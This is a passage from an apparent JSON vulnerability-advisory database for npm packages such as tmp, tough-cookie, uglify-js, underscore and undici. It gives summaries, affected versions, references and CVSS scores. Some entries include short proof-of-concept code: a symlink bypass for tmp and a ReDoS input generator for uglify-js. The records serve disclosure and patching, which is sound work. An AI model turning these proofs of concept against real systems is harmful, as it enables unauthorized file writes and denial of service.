"versions": [ "10.2.1" ] }, { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-11T00:34:35.482064314Z", "modified_time": "2025-09-10T17:54:37Z", "sha256": "c6c42dee5c9fab44968a5492f6069d39f9c0dd31e15ea9661b07c4b7a32a92d9", "source": "ghsa-malware", "versions": [ "10.2.1" ] }, { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-12T00:33:58.094285504Z", "modified_time": "2025-09-10T17:54:37Z", "sha256": "7915f9ca7a3b89c142b1610243be907ffe0c90ae4c03b664c003183d2a14cd36", "source": "ghsa-malware", "versions": [ "10.2.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4wf5-vphf-c2xc", "published": "2022-07-16T00:00:20Z", "modified": "2025-01-14T10:57:13.174999Z", "aliases": [ "CVE-2022-25858" ], "summary": "Terser insecure use of regular expressions leads to ReDoS", "details": "The package terser before 4.8.1, from 5.0.0 and before 5.14.2 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure usage of regular expressions.", "affected": [ { "package": { "name": "terser", "ecosystem": "npm", "purl": "pkg:npm/terser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.8.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-4wf5-vphf-c2xc/GHSA-4wf5-vphf-c2xc.json" } }, { "package": { "name": "terser", "ecosystem": "npm", "purl": "pkg:npm/terser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.14.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-4wf5-vphf-c2xc/GHSA-4wf5-vphf-c2xc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25858" }, { "type": "WEB", "url": "https://github.com/terser/terser/commit/a4da7349fdc92c05094f41d33d06d8cd4e90e76b" }, { 
"type": "WEB", "url": "https://github.com/terser/terser/commit/d8cc5691be980d663c29cc4d5ce67e852d597012" }, { "type": "PACKAGE", "url": "https://github.com/terser/terser" }, { "type": "WEB", "url": "https://github.com/terser/terser/blob/master/lib/compress/evaluate.js%23L135" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949722" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-TERSER-2806366" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2022-07-20T01:21:59Z", "nvd_published_at": "2022-07-15T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-52f5-9888-hmc6", "published": "2025-08-06T17:06:04Z", "modified": "2025-11-03T21:34:20Z", "aliases": [ "CVE-2025-54798" ], "related": [ "CGA-24xq-h2j3-3x86", "CGA-6p3x-59vm-9fq8" ], "summary": "tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter", "details": "### Summary\n\n`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.\n\n\n### Details\n\nAccording to the documentation there are some conditions that must be held:\n\n```\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50\n\nOther breaking changes, i.e.\n\n- template must be relative to tmpdir\n- name must be relative to tmpdir\n- dir option must be relative to tmpdir //\u003c-- this assumption can be bypassed using symlinks\n\nare still in place.\n\nIn order to override the system's tmpdir, you will have to use the newly\nintroduced tmpdir option.\n\n\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375\n* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.\n absolute paths are fine as long as they point to a location under the system's default temporary directory.\n Any 
directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, \n as tmp will not check the availability of the path, nor will it establish the requested path for you.\n```\n\nRelated issue: https://github.com/raszi/node-tmp/issues/207.\n\n\nThe issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579\nfunction _resolvePath(name, tmpDir) {\n if (name.startsWith(tmpDir)) {\n return path.resolve(name);\n } else {\n return path.resolve(path.join(tmpDir, name));\n }\n}\n```\n\nIf the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609\nfunction _assertIsRelative(name, option, tmpDir) {\n if (option === 'name') {\n // assert that name is not absolute and does not contain a path\n if (path.isAbsolute(name))\n throw new Error(`${option} option must not contain an absolute path, found \"${name}\".`);\n // must not fail on valid .\u003cname\u003e or ..\u003cname\u003e or similar such constructs\n let basename = path.basename(name);\n if (basename === '..' || basename === '.' 
|| basename !== name)\n throw new Error(`${option} option must not contain a path, found \"${name}\".`);\n }\n else { // if (option === 'dir' || option === 'template') {\n // assert that dir or template are relative to tmpDir\n if (path.isAbsolute(name) \u0026\u0026 !name.startsWith(tmpDir)) {\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${name}\".`);\n }\n let resolvedPath = _resolvePath(name, tmpDir); //\u003c--- \n if (!resolvedPath.startsWith(tmpDir))\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${resolvedPath}\".`);\n }\n}\n```\n\n\n### PoC\n\nThe following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.\nTested on a Linux machine.\n\n- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it\n```bash\nmkdir $HOME/mydir1\n\nln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir\n```\n\n- check the folder is empty:\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n```\n\n- run the poc\n```bash\nnode main.js\nFile: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf\ntest 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'\ntest 2: dir option must be relative to \"/tmp\", found \"/foo\".\ntest 3: dir option must be relative to \"/tmp\", found \"/home/user/mydir1\".\n```\n\n- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]\n```\n\n\n- `main.js`\n```js\n// npm i tmp@0.2.3\n\nconst tmp = require('tmp');\n\nconst tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});\nconsole.log('File: ', tmpobj.name);\n\ntry {\n tmp.fileSync({ 'dir': 'mydir1'});\n} catch (err) {\n console.log('test 1:', err.message)\n}\n\ntry {\n tmp.fileSync({ 'dir': '/foo'});\n} catch (err) {\n console.log('test 2:', err.message)\n}\n\ntry {\n const fs = require('node:fs');\n const resolved = fs.realpathSync('/tmp/evil-dir');\n tmp.fileSync({ 'dir': 
resolved});\n} catch (err) {\n console.log('test 3:', err.message)\n}\n```\n\n\nA Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.\n```js\nfunction _resolvePath(name, tmpDir) {\n let resolvedPath;\n if (name.startsWith(tmpDir)) {\n resolvedPath = path.resolve(name);\n } else {\n resolvedPath = path.resolve(path.join(tmpDir, name));\n }\n return fs.realpathSync(resolvedPath);\n}\n```\n\n\n### Impact\n\nArbitrary temporary file / directory write via symlink", "affected": [ { "package": { "name": "tmp", "ecosystem": "npm", "purl": "pkg:npm/tmp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.2.4" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.2.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-52f5-9888-hmc6/GHSA-52f5-9888-hmc6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54798" }, { "type": "WEB", "url": "https://github.com/raszi/node-tmp/issues/207" }, { "type": "WEB", "url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b" }, { "type": "PACKAGE", "url": "https://github.com/raszi/node-tmp" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html" } ], "database_specific": { "cwe_ids": [ "CWE-59" ], "github_reviewed": true, "github_reviewed_at": "2025-08-06T17:06:04Z", "nvd_published_at": "2025-08-07T01:15:26Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-72xf-g2v4-qvf3", "published": "2023-07-01T06:30:16Z", "modified": "2024-06-21T21:33:53Z", "aliases": [ "CVE-2023-26136" ], "related": [ "CGA-hf6q-478m-mm8p" ], "summary": "tough-cookie Prototype 
Pollution vulnerability", "details": "Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in `rejectPublicSuffixes=false` mode. This issue arises from the manner in which the objects are initialized.", "affected": [ { "package": { "name": "tough-cookie", "ecosystem": "npm", "purl": "pkg:npm/tough-cookie" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.1.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-72xf-g2v4-qvf3/GHSA-72xf-g2v4-qvf3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/issues/282" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e" }, { "type": "PACKAGE", "url": "https://github.com/salesforce/tough-cookie" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HUE6ZR5SL73KHL7XUPAOEL6SB7HUDT2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PVVPNSAGSDS63HQ74PJ7MZ3MU5IYNVZ" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2023-07-07T21:39:57Z", "nvd_published_at": "2023-07-01T05:15:16Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g7q5-pjjr-gqvp", "published": "2018-07-24T20:14:39Z", "modified": "2023-11-08T03:58:56.101045Z", "aliases": [ "CVE-2017-15010" ], "summary": "Regular Expression Denial of Service in tough-cookie", "details": "Affected versions of `tough-cookie` are susceptible to a regular expression denial of service.\n\nThe amplification on this vulnerability is relatively low - it takes around 2 seconds for the engine to execute on a malicious input which is 50,000 characters in length.\n\nIf node was compiled using the `-DHTTP_MAX_HEADER_SIZE` however, the impact of the vulnerability can be significant, as the primary limitation for the vulnerability is the default max HTTP header length in node.\n\n\n## Recommendation\n\nUpdate to version 2.3.3 or later.", "affected": [ { "package": { "name": "tough-cookie", "ecosystem": "npm", "purl": "pkg:npm/tough-cookie" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-g7q5-pjjr-gqvp/GHSA-g7q5-pjjr-gqvp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15010" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/issues/92" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/f1ed420a6a92ea7a5418df6e39e676556bc0c71d" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2912" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2913" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1263" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1264" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-g7q5-pjjr-gqvp" }, { "type": "PACKAGE", "url": "https://github.com/salesforce/tough-cookie" }, { 
"type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6VEBDTGNHVM677SLZDEHMWOP3ISMZSFT" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:tough-cookie:20170905" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/525" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/101185" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:36:20Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qhv9-728r-6jqg", "published": "2018-10-10T18:57:02Z", "modified": "2023-11-08T03:58:07.908980Z", "aliases": [ "CVE-2016-1000232" ], "summary": "ReDoS via long string of semicolons in tough-cookie", "details": "Affected versions of `tough-cookie` may be vulnerable to regular expression denial of service when long strings of semicolons exist in the `Set-Cookie` header.\n\n\n## Recommendation\n\nUpdate to version 2.3.0 or later.", "affected": [ { "package": { "name": "tough-cookie", "ecosystem": "npm", "purl": "pkg:npm/tough-cookie" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qhv9-728r-6jqg/GHSA-qhv9-728r-6jqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000232" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/615627206357d997d5e6ff9da158997de05235ae" }, { "type": "WEB", "url": "https://github.com/salesforce/tough-cookie/commit/e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:2101" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2912" }, { "type": "WEB", 
"url": "https://access.redhat.com/security/cve/cve-2016-1000232" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qhv9-728r-6jqg" }, { "type": "PACKAGE", "url": "https://github.com/salesforce/tough-cookie" }, { "type": "WEB", "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-api-connect-is-affected-by-node-js-tough-cookie-module-vulnerability-to-a-denial-of-service-cve-2016-1000232" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/130" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:52:05Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xc7v-wxcw-j472", "published": "2019-06-03T17:08:26Z", "modified": "2020-08-31T18:29:19Z", "summary": "Memory Exposure in tunnel-agent", "details": "Versions of `tunnel-agent` before 0.6.0 are vulnerable to memory exposure.\n\nThis is exploitable if user supplied input is provided to the auth value and is a number.\n\nProof-of-concept:\n```js\nrequire('request')({\n method: 'GET',\n uri: 'http://www.example.com',\n tunnel: true,\n proxy:{\n protocol: 'http:',\n host:'127.0.0.1',\n port:8080,\n auth:USERSUPPLIEDINPUT // number\n }\n});\n```\n\n\n## Recommendation\n\nUpdate to version 0.6.0 or later.", "affected": [ { "package": { "name": "tunnel-agent", "ecosystem": "npm", "purl": "pkg:npm/tunnel-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.6.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-xc7v-wxcw-j472/GHSA-xc7v-wxcw-j472.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/request/tunnel-agent/commit/9ca95ec7219daface8a6fc2674000653de0922c0" }, { "type": "WEB", "url": 
"https://gist.github.com/ChALkeR/fd6b2c445834244e7d440a043f9d2ff4" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/598" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2019-06-03T17:08:06Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-34r7-q49f-h37c", "published": "2017-10-24T18:33:36Z", "modified": "2024-02-16T08:16:42.823655Z", "aliases": [ "CVE-2015-8857" ], "summary": "Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js", "details": "Versions of `uglify-js` prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.\n\n## Recommendation\n\nUpgrade UglifyJS to version \u003e= 2.4.24.", "affected": [ { "package": { "name": "uglify-js", "ecosystem": "npm", "purl": "pkg:npm/uglify-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.4.24" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-34r7-q49f-h37c/GHSA-34r7-q49f-h37c.json" } }, { "package": { "name": "uglifier", "ecosystem": "RubyGems", "purl": "pkg:gem/uglifier" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.2" } ] } ], "versions": [ "0.1.0", "0.1.1", "0.2.0", "0.3.0", "0.4.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "1.0.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.2.7", "1.3.0", "2.0.0", "2.0.1", "2.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.3.0", "2.3.1", "2.3.2", "2.3.3", "2.4.0", "2.5.0", "2.5.1", "2.5.3", "2.6.0", "2.6.1", "2.7.0", "2.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-34r7-q49f-h37c/GHSA-34r7-q49f-h37c.json" } } ], "references": [ { "type": "ADVISORY", 
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8857" }, { "type": "WEB", "url": "https://github.com/mishoo/UglifyJS2/issues/751" }, { "type": "WEB", "url": "https://github.com/lautis/uglifier/commit/4677bfe38142937ff952f95605bcec4618892c3e" }, { "type": "PACKAGE", "url": "https://github.com/mishoo/UglifyJS2" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uglifier/CVE-2015-8857.yml" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227190830/http://www.securityfocus.com/bid/96410" }, { "type": "WEB", "url": "https://zyan.scripts.mit.edu/blog/backdooring-js" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" } ], "database_specific": { "cwe_ids": [ "CWE-1254", "CWE-670" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:54:00Z", "nvd_published_at": "2017-01-23T21:59:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c9f4-xj24-8jqx", "published": "2017-10-24T18:33:36Z", "modified": "2023-11-08T03:58:03.623951Z", "aliases": [ "CVE-2015-8858" ], "summary": "Regular Expression Denial of Service in uglify-js", "details": "Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method.\n\n\n### Proof of Concept\n\n```\nvar u = require('uglify-js');\nvar genstr = function (len, chr) {\n var result = \"\";\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n\n return result;\n}\n\nu.parse(\"var a = \" + genstr(process.argv[2], \"1\") + \".1ee7;\");\n```\n\n### Results\n```\n$ time node test.js 10000\nreal\t0m1.091s\nuser\t0m1.047s\nsys\t0m0.039s\n\n$ time node test.js 80000\nreal\t0m6.486s\nuser\t0m6.229s\nsys\t0m0.094s\n```\n\n\n## Recommendation\n\nUpdate to version 2.6.0 or later.", "affected": [ { "package": { "name": "uglify-js", 
"ecosystem": "npm", "purl": "pkg:npm/uglify-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-c9f4-xj24-8jqx/GHSA-c9f4-xj24-8jqx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8858" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c9f4-xj24-8jqx" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/48" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96409" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:50Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cf4h-3jhx-xvhq", "published": "2021-05-06T16:09:43Z", "modified": "2025-11-04T16:33:59Z", "aliases": [ "CVE-2021-23358" ], "summary": "Arbitrary Code Execution in underscore", "details": "The package `underscore` from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument as it is not sanitized.", "affected": [ { "package": { "name": "underscore", "ecosystem": "npm", "purl": "pkg:npm/underscore" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.3.2" }, { "fixed": "1.12.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-cf4h-3jhx-xvhq/GHSA-cf4h-3jhx-xvhq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23358" }, { "type": "WEB", "url": 
"https://github.com/jashkenas/underscore/pull/2917" }, { "type": "WEB", "url": "https://github.com/jashkenas/underscore/commit/4c73526d43838ad6ab43a6134728776632adeb66" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-14" }, { "type": "WEB", "url": "https://www.npmjs.com/package/underscore" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4883" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-UNDERSCORE-1080984" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1081503" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBJASHKENAS-1081505" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1081504" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240808-0003" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGEE7U4Z655A2MK5EW4UQQZ7B64XJWBV" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKATXXETD2PF3OR36Q5PD2VSVAR6J5Z" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGEE7U4Z655A2MK5EW4UQQZ7B64XJWBV" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKATXXETD2PF3OR36Q5PD2VSVAR6J5Z" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00038.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re69ee408b3983b43e9c4a82a9a17cbbf8681bb91a4b61b46f365aeaf@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re69ee408b3983b43e9c4a82a9a17cbbf8681bb91a4b61b46f365aeaf%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbc84926bacd377503a3f5c37b923c1931f9d343754488d94e6f08039@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc84926bacd377503a3f5c37b923c1931f9d343754488d94e6f08039%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raae088abdfa4fbd84e1d19d7a7ffe52bf8e426b83e6599ea9a734dba@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raae088abdfa4fbd84e1d19d7a7ffe52bf8e426b83e6599ea9a734dba%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r770f910653772317b117ab4472b0a32c266ee4abbafda28b8a6f9306@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r770f910653772317b117ab4472b0a32c266ee4abbafda28b8a6f9306%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5df90c46f7000c4aab246e947f62361ecfb849c5a553dcdb0ef545e1@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5df90c46f7000c4aab246e947f62361ecfb849c5a553dcdb0ef545e1%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/jashkenas/underscore/releases/tag/1.12.1" }, { "type": "WEB", "url": "https://github.com/jashkenas/underscore/blob/master/modules/template.js%23L71" }, { "type": "PACKAGE", "url": "https://github.com/jashkenas/underscore" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2025/Apr/14" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-03-31T21:59:00Z", "nvd_published_at": "2021-03-29T14:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3787-6prv-h9w3", "published": "2024-02-16T16:02:52Z", "modified": "2024-05-02T13:15:07Z", 
"aliases": [ "CVE-2024-24758" ], "related": [ "CVE-2024-24758" ], "summary": "Undici proxy-authorization header not cleared on cross-origin redirect in fetch", "details": "### Impact\n\nUndici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authorization` headers. \n\n### Patches\n\nThis is patched in v5.28.3 and v6.6.1\n\n### Workarounds\n\nThere are no known workarounds.\n\n### References\n\n- https://fetch.spec.whatwg.org/#authentication-entries\n- https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.28.3" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.28.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3787-6prv-h9w3/GHSA-3787-6prv-h9w3.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.6.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.6.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3787-6prv-h9w3/GHSA-3787-6prv-h9w3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24758" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/b9da3e40f1f096a06b4caedbb27c2568730434ef" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/d3aa574b1259c1d8d329a0f0f495ee82882b1458" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.28.3" }, { "type": "WEB", "url": 
